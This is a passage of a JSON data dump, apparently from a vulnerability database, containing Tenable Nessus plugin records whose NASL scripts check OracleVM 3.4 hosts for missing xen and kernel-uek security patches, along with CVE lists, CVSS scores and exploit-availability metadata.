exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "9e33ebe844d7e88ee97bfa9301de7569", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8037f56d4d98ec6b5e687bc34cd58867", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": 
"f9bdb390f81adf9057882e27cce0b598", "key": "sourceData"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}], "hash": "16dc592be182dc64c973024a2a62e614c8deead455447e42cb26961761578d4b"}}, {"lastseen": "2019-10-28T21:06:17", "edition": 8, "differentElements": ["modified"], "bulletin": {"lastseen": "2019-10-28T21:06:17", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 8, "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"modified": "2019-10-28T21:06:17", "vector": "NONE", "value": 3.1}, "dependencies": {"references": [{"idList": ["MSF:EXPLOIT/UNIX/WEBAPP/SUGARCRM_REST_UNSERIALIZE_EXEC"], "type": "metasploit"}, {"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3607.NASL", "ORACLEVM_OVMSA-2017-0144.NASL"], "type": "nessus"}], "modified": "2019-10-28T21:06:17"}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2019-10-02T00:00:00", "href": "https://www.tenable.com/plugins/nessus/95620", 
"id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "bbab0c647b2f01faf2a161133a12fdd7", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "dc233597f3760b02c8ddebc69eee649e", "key": 
"description"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "64c3c860632671783599c242de75d407", "key": "href"}, {"hash": "b7beaf9d124542f914ef08e608facdab", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "3cc4b84e3647c026dffb7e6cdae1953fc3bf7c6c08782233060764d61dda2872"}}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "8b9f10f18591da16417a9436b16c9610"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "dc233597f3760b02c8ddebc69eee649e"}, {"key": "href", "hash": "64c3c860632671783599c242de75d407"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "63d4fd9a95be526174d65f5ab80055d7"}, {"key": "pluginID", "hash": "77d8b92f7e4ad09337545800164f0737"}, {"key": "published", "hash": "f73a7def4acb756ae33e8fc8d23622eb"}, {"key": "references", "hash": "0c70f99fb718b8ef3906a2e2ecfddb58"}, {"key": "reporter", "hash": "b7beaf9d124542f914ef08e608facdab"}, {"key": "sourceData", "hash": "bbab0c647b2f01faf2a161133a12fdd7"}, {"key": "title", "hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7c72068be302e1a87a88d8cde6f809e9ef641cbd0aed445c30890cfe61491707", "viewCount": 1, "enchantments": {"dependencies": 
{"references": [{"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3607.NASL"], "type": "nessus"}], "modified": "2019-11-01T03:18:52"}, "score": {"value": 3.4, "vector": "NONE", "modified": "2019-11-01T03:18:52"}, "vulnersScore": 3.4}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "naslFamily": "OracleVM Local Security Checks", "pluginID": "95620", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "scheme": null}
{"nessus": [{"lastseen": "2019-12-13T08:50:30", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2018-0015 for details.", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2018-0015.NASL", "href": "https://www.tenable.com/plugins/nessus/106469", "published": "2018-01-30T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0015) (BlueBorne) (Meltdown) (Spectre) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0015.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106469);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10229\", \"CVE-2016-6213\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000407\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-2671\", \"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2017-5754\", \"CVE-2017-7273\", \"CVE-2017-7308\", \"CVE-2017-7533\", \"CVE-2017-7645\", \"CVE-2017-7895\", \"CVE-2017-8797\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0015) (BlueBorne) (Meltdown) (Spectre) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2018-0015 for details.\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-January/000826.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?81fd788e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET packet_set_ring Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/29\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-61.63.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-61.63.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:19", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2017-0174 for details.", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0174.NASL", "href": "https://www.tenable.com/plugins/nessus/105248", "published": "2017-12-14T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0174) (BlueBorne) (Dirty COW) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0174.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105248);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10318\", 
\"CVE-2016-1575\", \"CVE-2016-1576\", \"CVE-2016-6213\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000405\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12154\", \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-16527\", \"CVE-2017-16650\", \"CVE-2017-2618\", \"CVE-2017-2671\", \"CVE-2017-7477\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-7618\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0174) (BlueBorne) (Dirty COW) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2017-0174 for details.\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-December/000805.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0059c7d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-112.14.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:44", "bulletinFamily": "scanner", "description": 